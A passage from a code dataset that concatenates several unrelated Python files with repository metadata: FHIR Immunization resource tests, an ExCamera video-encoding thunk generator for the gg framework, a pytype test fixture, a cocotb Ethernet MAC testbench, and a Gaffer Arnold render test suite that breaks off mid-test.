assert inst.date == fhirtypes.Date.validate("2013-01-10")
assert inst.explanation.reasonNotGiven[0].coding[0].code == "MEDPREC"
assert inst.explanation.reasonNotGiven[0].coding[0].display == (
"medical precaution"
)
assert inst.explanation.reasonNotGiven[0].coding[0].system == (
"http://hl7.org/fhir/v3/ActReason"
)
assert inst.id == "notGiven"
assert inst.reported is False
assert inst.status == "completed"
assert inst.text.status == "generated"
assert inst.vaccineCode.coding[0].code == "01"
assert inst.vaccineCode.coding[0].display == "DTP"
assert inst.vaccineCode.coding[0].system == "http://hl7.org/fhir/sid/cvx"
assert inst.wasNotGiven is True
def test_Immunization_2(base_settings):
filename = base_settings["unittest_data_dir"] / "immunization-example.json"
inst = immunization.Immunization.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Immunization" == inst.resource_type
impl_Immunization_2(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Immunization" == data["resourceType"]
inst2 = immunization.Immunization(**data)
impl_Immunization_2(inst2)
def impl_Immunization_2(inst):
assert inst.date == fhirtypes.Date.validate("2013-01-10")
assert inst.doseQuantity.code == "mg"
assert inst.doseQuantity.system == "http://unitsofmeasure.org"
assert inst.doseQuantity.value == 5
assert inst.expirationDate == fhirtypes.Date.validate("2015-02-15")
assert inst.explanation.reason[0].coding[0].code == "429060002"
assert inst.explanation.reason[0].coding[0].system == "http://snomed.info/sct"
assert inst.id == "example"
assert inst.identifier[0].system == "urn:ietf:rfc:3986"
assert inst.identifier[0].value == "urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"
assert inst.lotNumber == "AAJN11K"
assert inst.note[0].text == "Notes on adminstration of vaccine"
assert inst.reaction[0].date == fhirtypes.Date.validate("2013-01-10")
assert inst.reaction[0].reported is True
assert inst.reported is False
assert inst.route.coding[0].code == "IM"
assert inst.route.coding[0].display == "Injection, intramuscular"
assert inst.route.coding[0].system == (
"http://hl7.org/fhir/v3/RouteOfAdministration"
)
assert inst.site.coding[0].code == "LA"
assert inst.site.coding[0].display == "left arm"
assert inst.site.coding[0].system == "http://hl7.org/fhir/v3/ActSite"
assert inst.status == "completed"
assert inst.text.status == "generated"
assert inst.vaccinationProtocol[0].description == (
"Vaccination Protocol Sequence 1"
)
assert inst.vaccinationProtocol[0].doseSequence == 1
assert inst.vaccinationProtocol[0].doseStatus.coding[0].code == "count"
assert inst.vaccinationProtocol[0].doseStatus.coding[0].display == "Counts"
assert inst.vaccinationProtocol[0].doseStatus.coding[0].system == (
"http://hl7.org/fhir/vaccination-protocol-dose-status"
)
assert inst.vaccinationProtocol[0].doseStatusReason.coding[0].code == "coldchbrk"
assert inst.vaccinationProtocol[0].doseStatusReason.coding[0].display == (
"Cold chain break"
)
assert inst.vaccinationProtocol[0].doseStatusReason.coding[0].system == (
"http://hl7.org/fhir/vaccination-protocol-dose-status-reason"
)
assert inst.vaccinationProtocol[0].series == "Vaccination Series 1"
assert inst.vaccinationProtocol[0].seriesDoses == 2
assert inst.vaccinationProtocol[0].targetDisease[0].coding[0].code == ("1857005")
assert inst.vaccinationProtocol[0].targetDisease[0].coding[0].system == (
"http://snomed.info/sct"
)
assert inst.vaccineCode.coding[0].code == "FLUVAX"
assert inst.vaccineCode.coding[0].system == "urn:oid:172.16.31.10.2001.1005.17"
assert inst.vaccineCode.text == "Fluvax (Influenza)"
assert inst.wasNotGiven is False
|
Testcase4-Application-breakdown/online-compiling/tools/python_sdk/examples/excamera-example/excam_ex.py
|
hunhoffe/ServerlessBench
| 129 |
128983
|
#! /usr/bin/python3
from gg_sdk import GG, GGThunk
import sys
import math
VPXENC = 'vpxenc --ivf --codec=vp8 --good --cpu-used=0 --end-usage=cq --min-q=0 --max-q=63 --cq-level={quality} --buf-initial-sz=10000 --buf-optimal-sz=20000 --buf-sz=40000 --undershoot-pct=100 --passes=2 --auto-alt-ref=1 --threads=1 --token-parts=0 --tune=ssim --target-bitrate=4294967295 -o {output}.ivf {input}.y4m'
TERMINATE_CHUNK = "xc-terminate-chunk {input}.ivf {output}.ivf"
XC_DUMP_0 = 'xc-dump {input}.ivf {output}.state'
XC_DUMP_1 = 'xc-dump -S {input_state}.state {input}.ivf {output}.state'
XC_ENC_FIRST_FRAME = 'xc-enc -W -w 0.75 -i y4m -o {output}.ivf -r -I {source_state}.state -p {input_pred}.ivf {input}.y4m'
XC_ENC_REBASE = 'xc-enc -W -w 0.75 -i y4m -o {output}.ivf -r -I {source_state}.state -p {input_pred}.ivf -S {pred_state}.state {input}.y4m'
def bname(i):
return "{:08d}".format(i)
def make_command(cmd):
return "\t{}".format(cmd)
"""
For this pipeline, we must keep track of state. Therefore, as we create
the thunks, we add them to individual lists and index into them
accordingly.
In addition, since outputs are "recomputed", we should only return the
most recent GGThunk associated with a particular output. Hence we use
a dictionary with key=output, value=GGThunk.
"""
def generate_batch(start, end, quality):
thunk_dict = {}
vpxenc_list = []
term_chunk_list = []
xc_dump_list = []
xc_enc_ff_list = []
xc_dump1_list = []
for i in range(start, end + 1):
name = bname(i)
vpxenc = make_command(VPXENC.format(quality=quality,
input=name, output="%s-vpxenc" % name))
vpxenc_split = vpxenc.split()
vpxenc_thunk = GGThunk(exe=vpxenc_split[0],
outname="%s-vpxenc.ivf" % name, exe_args=vpxenc_split[1:],
args_infiles=False)
vpxenc_thunk.add_infile(name + '.y4m')
vpxenc_list.append(vpxenc_thunk)
thunk_dict["%s-vpxenc.ivf" % name] = vpxenc_thunk
term_chunk_outname = ''
if i == start:
term_chunk = make_command(TERMINATE_CHUNK.format(input="%s-vpxenc" % name,
output="%s" % name))
term_chunk_split = term_chunk.split()
term_chunk_thunk = GGThunk(exe=term_chunk_split[0],
outname="%s.ivf" % name,
exe_args=term_chunk_split[1:],
args_infiles=False)
term_chunk_outname = "%s.ivf" % name
else:
term_chunk = make_command(TERMINATE_CHUNK.format(input="%s-vpxenc" % name,
output="%s-0" % name))
term_chunk_split = term_chunk.split()
term_chunk_thunk = GGThunk(exe=term_chunk_split[0],
outname="%s-0.ivf" % name,
exe_args=term_chunk_split[1:],
args_infiles=False)
term_chunk_outname = "%s-0.ivf" % name
term_chunk_thunk.add_infile(vpxenc_thunk)
term_chunk_list.append(term_chunk_thunk)
thunk_dict[term_chunk_outname] = term_chunk_thunk
if i == start:
xc_dump = make_command(XC_DUMP_0.format(input=name, output="%s-0" % name))
xc_dump_split = xc_dump.split()
xc_dump_thunk = GGThunk(exe=xc_dump_split[0],
outname="%s-0.state" % name,
exe_args=xc_dump_split[1:],
args_infiles=False)
else:
xc_dump = make_command(XC_DUMP_0.format(input="%s-0" % name,
output="%s-0" % name))
xc_dump_split = xc_dump.split()
xc_dump_thunk = GGThunk(exe=xc_dump_split[0],
outname="%s-0.state" % name,
exe_args=xc_dump_split[1:],
args_infiles=False)
xc_dump_thunk.add_infile(term_chunk_thunk)
xc_dump_list.append(xc_dump_thunk)
thunk_dict["%s-0.state" % name] = xc_dump_thunk
for ind, i in enumerate(range(start + 1, end + 1)):
name = bname(i)
prev_name = bname(i - 1)
x_enc_ff_outname = ''
if i == (start + 1):
xc_enc_ff = make_command(XC_ENC_FIRST_FRAME.format(input=name, output=name,
source_state="%s-0" % prev_name,
input_pred="%s-0" % name))
xc_enc_ff_split = xc_enc_ff.split()
xc_enc_ff_thunk = GGThunk(exe=xc_enc_ff_split[0],
outname=name+'.ivf',
exe_args=xc_enc_ff_split[1:],
args_infiles=False)
x_enc_ff_outname = name+'.ivf'
else:
xc_enc_ff = make_command(XC_ENC_FIRST_FRAME.format(input=name,
output="%s-1" % name,
source_state="%s-0" % prev_name,
input_pred="%s-0" % name))
xc_enc_ff_split = xc_enc_ff.split()
xc_enc_ff_thunk = GGThunk(exe=xc_enc_ff_split[0],
outname=name+'-1.ivf',
exe_args=xc_enc_ff_split[1:],
args_infiles=False)
x_enc_ff_outname = name+'-1.ivf'
xc_enc_ff_thunk.add_infile([xc_dump_list[ind],
term_chunk_list[ind+1], name+'.y4m'])
xc_enc_ff_list.append(xc_enc_ff_thunk)
thunk_dict[x_enc_ff_outname] = xc_enc_ff_thunk
if i == (start + 1):
xc_dump1 = make_command(XC_DUMP_1.format(input=name,
input_state="%s-0" % prev_name,
output="%s-1" % name))
xc_dump1_split = xc_dump1.split()
xc_dump1_thunk = GGThunk(exe=xc_dump1_split[0],
outname="%s-1.state" % name,
exe_args=xc_dump1_split[1:],
args_infiles=False)
xc_dump1_thunk.add_infile([xc_dump_list[ind], xc_enc_ff_thunk])
xc_dump1_list.append(xc_dump1_thunk)
thunk_dict['%s-1.state' % name] = xc_dump1_thunk
for ind, i in enumerate(range(start + 2, end + 1)):
name = bname(i)
prev_name = bname(i - 1)
xc_enc_rb = make_command(XC_ENC_REBASE.format(output=name, input=name,
source_state="%s-1" % prev_name,
input_pred="%s-1" % name, pred_state="%s-0" % prev_name))
xc_enc_rb_split = xc_enc_rb.split()
xc_enc_rb_thunk = GGThunk(exe=xc_enc_rb_split[0],
outname=name+'.ivf',
exe_args=xc_enc_rb_split[1:],
args_infiles=False)
xc_enc_rb_thunk.add_infile([xc_dump_list[ind+1], xc_enc_ff_list[ind+1],
xc_dump1_list[ind], name+'.y4m'])
thunk_dict[name+'.ivf'] = xc_enc_rb_thunk
if i != end:
xc_dump12 = make_command(XC_DUMP_1.format(input=name,
input_state="%s-1" % prev_name, output="%s-1" % name))
xc_dump12_split = xc_dump12.split()
xc_dump12_thunk = GGThunk(exe=xc_dump12_split[0],
outname="%s-1.state" % name,
exe_args=xc_dump12_split[1:],
args_infiles=False)
xc_dump12_thunk.add_infile([xc_dump1_list[ind], xc_enc_rb_thunk])
xc_dump1_list.append(xc_dump12_thunk)
thunk_dict["%s-1.state" % name] = xc_dump12_thunk
return list(thunk_dict.values())
if __name__ == '__main__':
if len(sys.argv) != 5:
print("Usage: gen_makefile.py <start> <end> <batch-size> <cq-level>")
sys.exit(1)
start = int(sys.argv[1])
end = int(sys.argv[2])
batch_size = int(sys.argv[3])
quality = int(sys.argv[4])
gg = GG()
batch_start = start
out_thunks = []
for batch_index in range(math.ceil((end - start + 1) / batch_size)):
batch_end = min(batch_start + batch_size - 1, end)
out_thunks.extend(generate_batch(batch_start, batch_end, quality))
batch_start = batch_end + 1
gg.create_thunks(out_thunks)
|
pytype/tools/merge_pyi/test_data/scope.py
|
Jrryy/pytype
| 3,882 |
128985
|
class C:
def f(self, x):
pass
def g(self):
def f(x): #gets ignored by pytype but fixer sees it, generates warning (FIXME?)
return 1
return f
|
tb/eth_mac_mii_fifo/test_eth_mac_mii_fifo.py
|
fdarling/verilog-ethernet
| 395 |
128995
|
#!/usr/bin/env python
"""
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import itertools
import logging
import os
import cocotb_test.simulator
import cocotb
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge
from cocotb.regression import TestFactory
from cocotbext.eth import GmiiFrame, MiiPhy
from cocotbext.axi import AxiStreamBus, AxiStreamSource, AxiStreamSink
class TB:
def __init__(self, dut, speed=100e6):
self.dut = dut
self.log = logging.getLogger("cocotb.tb")
self.log.setLevel(logging.DEBUG)
cocotb.fork(Clock(dut.logic_clk, 40, units="ns").start())
self.mii_phy = MiiPhy(dut.mii_txd, dut.mii_tx_er, dut.mii_tx_en, dut.mii_tx_clk,
dut.mii_rxd, dut.mii_rx_er, dut.mii_rx_dv, dut.mii_rx_clk, speed=speed)
self.axis_source = AxiStreamSource(AxiStreamBus.from_prefix(dut, "tx_axis"), dut.logic_clk, dut.logic_rst)
self.axis_sink = AxiStreamSink(AxiStreamBus.from_prefix(dut, "rx_axis"), dut.logic_clk, dut.logic_rst)
dut.ifg_delay.setimmediatevalue(0)
async def reset(self):
self.dut.logic_rst.setimmediatevalue(0)
for k in range(10):
await RisingEdge(self.dut.logic_clk)
self.dut.logic_rst <= 1
for k in range(10):
await RisingEdge(self.dut.logic_clk)
self.dut.logic_rst <= 0
for k in range(10):
await RisingEdge(self.dut.logic_clk)
async def run_test_rx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=100e6):
tb = TB(dut, speed)
tb.mii_phy.rx.ifg = ifg
tb.dut.ifg_delay <= ifg
await tb.reset()
test_frames = [payload_data(x) for x in payload_lengths()]
for test_data in test_frames:
test_frame = GmiiFrame.from_payload(test_data)
await tb.mii_phy.rx.send(test_frame)
for test_data in test_frames:
rx_frame = await tb.axis_sink.recv()
assert rx_frame.tdata == test_data
assert rx_frame.tuser == 0
assert tb.axis_sink.empty()
await RisingEdge(dut.logic_clk)
await RisingEdge(dut.logic_clk)
async def run_test_tx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=100e6):
tb = TB(dut, speed)
tb.mii_phy.rx.ifg = ifg
tb.dut.ifg_delay <= ifg
await tb.reset()
test_frames = [payload_data(x) for x in payload_lengths()]
for test_data in test_frames:
await tb.axis_source.send(test_data)
for test_data in test_frames:
rx_frame = await tb.mii_phy.tx.recv()
assert rx_frame.get_payload() == test_data
assert rx_frame.check_fcs()
assert rx_frame.error is None
assert tb.mii_phy.tx.empty()
await RisingEdge(dut.logic_clk)
await RisingEdge(dut.logic_clk)
def size_list():
return list(range(60, 128)) + [512, 1514] + [60]*10
def incrementing_payload(length):
return bytearray(itertools.islice(itertools.cycle(range(256)), length))
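# Note: cycle_en() is not referenced in this testbench; it appears to be kept
# for consistency with the other eth_mac tests (assumption).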
def cycle_en():
return itertools.cycle([0, 0, 0, 1])
if cocotb.SIM_NAME:
for test in [run_test_rx, run_test_tx]:
factory = TestFactory(test)
factory.add_option("payload_lengths", [size_list])
factory.add_option("payload_data", [incrementing_payload])
factory.add_option("ifg", [12])
factory.add_option("speed", [100e6, 10e6])
factory.generate_tests()
# cocotb-test
tests_dir = os.path.abspath(os.path.dirname(__file__))
rtl_dir = os.path.abspath(os.path.join(tests_dir, '..', '..', 'rtl'))
lib_dir = os.path.abspath(os.path.join(rtl_dir, '..', 'lib'))
axis_rtl_dir = os.path.abspath(os.path.join(lib_dir, 'axis', 'rtl'))
def test_eth_mac_mii_fifo(request):
dut = "eth_mac_mii_fifo"
module = os.path.splitext(os.path.basename(__file__))[0]
toplevel = dut
verilog_sources = [
os.path.join(rtl_dir, f"{dut}.v"),
os.path.join(rtl_dir, "eth_mac_mii.v"),
os.path.join(rtl_dir, "ssio_sdr_in.v"),
os.path.join(rtl_dir, "mii_phy_if.v"),
os.path.join(rtl_dir, "eth_mac_1g.v"),
os.path.join(rtl_dir, "axis_gmii_rx.v"),
os.path.join(rtl_dir, "axis_gmii_tx.v"),
os.path.join(rtl_dir, "lfsr.v"),
os.path.join(axis_rtl_dir, "axis_adapter.v"),
os.path.join(axis_rtl_dir, "axis_async_fifo.v"),
os.path.join(axis_rtl_dir, "axis_async_fifo_adapter.v"),
]
parameters = {}
parameters['AXIS_DATA_WIDTH'] = 8
parameters['AXIS_KEEP_ENABLE'] = int(parameters['AXIS_DATA_WIDTH'] > 8)
parameters['AXIS_KEEP_WIDTH'] = parameters['AXIS_DATA_WIDTH'] // 8
parameters['ENABLE_PADDING'] = 1
parameters['MIN_FRAME_LENGTH'] = 64
parameters['TX_FIFO_DEPTH'] = 16384
parameters['TX_FRAME_FIFO'] = 1
parameters['TX_DROP_OVERSIZE_FRAME'] = parameters['TX_FRAME_FIFO']
parameters['TX_DROP_BAD_FRAME'] = parameters['TX_DROP_OVERSIZE_FRAME']
parameters['TX_DROP_WHEN_FULL'] = 0
parameters['RX_FIFO_DEPTH'] = 16384
parameters['RX_FRAME_FIFO'] = 1
parameters['RX_DROP_OVERSIZE_FRAME'] = parameters['RX_FRAME_FIFO']
parameters['RX_DROP_BAD_FRAME'] = parameters['RX_DROP_OVERSIZE_FRAME']
parameters['RX_DROP_WHEN_FULL'] = parameters['RX_DROP_OVERSIZE_FRAME']
extra_env = {f'PARAM_{k}': str(v) for k, v in parameters.items()}
sim_build = os.path.join(tests_dir, "sim_build",
request.node.name.replace('[', '-').replace(']', ''))
cocotb_test.simulator.run(
python_search=[tests_dir],
verilog_sources=verilog_sources,
toplevel=toplevel,
module=module,
parameters=parameters,
sim_build=sim_build,
extra_env=extra_env,
)
|
python/GafferArnoldTest/ArnoldRenderTest.py
|
murraystevenson/gaffer
| 561 |
129015
|
##########################################################################
#
# Copyright (c) 2012, <NAME>. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import inspect
import unittest
import subprocess32 as subprocess
import threading
import arnold
import imath
import six
import IECore
import IECoreImage
import IECoreScene
import IECoreArnold
import Gaffer
import GafferTest
import GafferDispatch
import GafferImage
import GafferScene
import GafferSceneTest
import GafferOSL
import GafferArnold
import GafferArnoldTest
class ArnoldRenderTest( GafferSceneTest.SceneTestCase ) :
def setUp( self ) :
GafferSceneTest.SceneTestCase.setUp( self )
self.__scriptFileName = self.temporaryDirectory() + "/test.gfr"
def tearDown( self ) :
GafferSceneTest.SceneTestCase.tearDown( self )
GafferScene.SceneAlgo.deregisterRenderAdaptor( "Test" )
def testExecute( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression( "parent['render']['fileName'] = '" + self.temporaryDirectory() + "/test.%d.ass' % int( context['frame'] )" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.assertFalse( p.returncode )
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%d.ass" % i ) )
def testWaitForImage( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.tif" ) )
def testExecuteWithStringSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.assertFalse( p.returncode )
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%04d.ass" % i ) )
def testImageOutput( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.####.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
c = Gaffer.Context()
for i in range( 1, 4 ) :
c.setFrame( i )
with c :
s["render"]["task"].execute()
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%04d.tif" % i ) )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferArnold )
self.assertTypeNamesArePrefixed( GafferArnoldTest )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferArnold )
self.assertDefaultNamesAreCorrect( GafferArnoldTest )
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferArnold )
self.assertNodesConstructWithDefaultValues( GafferArnoldTest )
def testDirectoryCreation( self ) :
s = Gaffer.ScriptNode()
s["variables"].addChild( Gaffer.NameValuePlug( "renderDirectory", self.temporaryDirectory() + "/renderTests" ) )
s["variables"].addChild( Gaffer.NameValuePlug( "assDirectory", self.temporaryDirectory() + "/assTests" ) )
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
"$renderDirectory/test.####.exr",
"exr",
"rgba",
{}
)
)
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["fileName"].setValue( "$assDirectory/test.####.ass" )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
# check it can cope with everything already existing
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
def testWedge( self ) :
s = Gaffer.ScriptNode()
s["sphere"] = GafferScene.Sphere()
s["sphere"]["sets"].setValue( "${wedge:value}" )
s["filter"] = GafferScene.SetFilter()
s["filter"]["setExpression"].setValue( "hidden" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["attributes"]["visibility"]["enabled"].setValue( True )
s["attributes"]["attributes"]["visibility"]["value"].setValue( False )
s["attributes"]["filter"].setInput( s["filter"]["out"] )
s["attributes"]["in"].setInput( s["sphere"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/${wedge:value}.tif",
"tiff",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["attributes"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["render"]["in"].setInput( s["outputs"]["out"] )
s["wedge"] = GafferDispatch.Wedge()
s["wedge"]["mode"].setValue( int( s["wedge"].Mode.StringList ) )
s["wedge"]["strings"].setValue( IECore.StringVectorData( [ "visible", "hidden" ] ) )
s["wedge"]["preTasks"][0].setInput( s["render"]["task"] )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
s.save()
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() + "/testJobDirectory" )
dispatcher["framesMode"].setValue( GafferDispatch.Dispatcher.FramesMode.CurrentFrame )
dispatcher["executeInBackground"].setValue( False )
dispatcher.dispatch( [ s["wedge"] ] )
hidden = GafferImage.ImageReader()
hidden["fileName"].setValue( self.temporaryDirectory() + "/hidden.tif" )
visible = GafferImage.ImageReader()
visible["fileName"].setValue( self.temporaryDirectory() + "/visible.tif" )
hiddenStats = GafferImage.ImageStats()
hiddenStats["in"].setInput( hidden["out"] )
hiddenStats["area"].setValue( hiddenStats["in"]["dataWindow"].getValue() )
visibleStats = GafferImage.ImageStats()
visibleStats["in"].setInput( visible["out"] )
visibleStats["area"].setValue( visibleStats["in"]["dataWindow"].getValue() )
self.assertLess( hiddenStats["average"].getValue()[0], 0.05 )
self.assertGreater( visibleStats["average"].getValue()[0], .27 )
@staticmethod
def __m44f( m ) :
return imath.M44f( *[ i for row in m.data for i in row ] )
def testTransformMotion( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["sphere"] = GafferScene.Sphere()
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["plane"]["out"] )
s["group"]["in"][1].setInput( s["sphere"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression(
inspect.cleandoc(
"""
parent["plane"]["transform"]["translate"]["x"] = context.getFrame()
parent["sphere"]["transform"]["translate"]["y"] = context.getFrame() * 2
parent["group"]["transform"]["translate"]["z"] = context.getFrame() - 1
"""
)
)
s["planeFilter"] = GafferScene.PathFilter()
s["planeFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["group"]["out"] )
s["attributes"]["filter"].setInput( s["planeFilter"]["out"] )
s["attributes"]["attributes"]["transformBlur"]["enabled"].setValue( True )
s["attributes"]["attributes"]["transformBlur"]["value"].setValue( False )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["attributes"]["out"] )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["transformBlur"]["enabled"].setValue( True )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# No motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrix = arnold.AiNodeGetMatrix( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrix = arnold.AiNodeGetMatrix( plane, "matrix" )
# Motion parameters should be left at default
self.assertEqual( sphereMotionStart, 0 )
self.assertEqual( sphereMotionEnd, 1 )
self.assertEqual( planeMotionStart, 0 )
self.assertEqual( planeMotionEnd, 1 )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, 2, 0 ) )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, 0 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 1 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), False )
# Motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( True )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
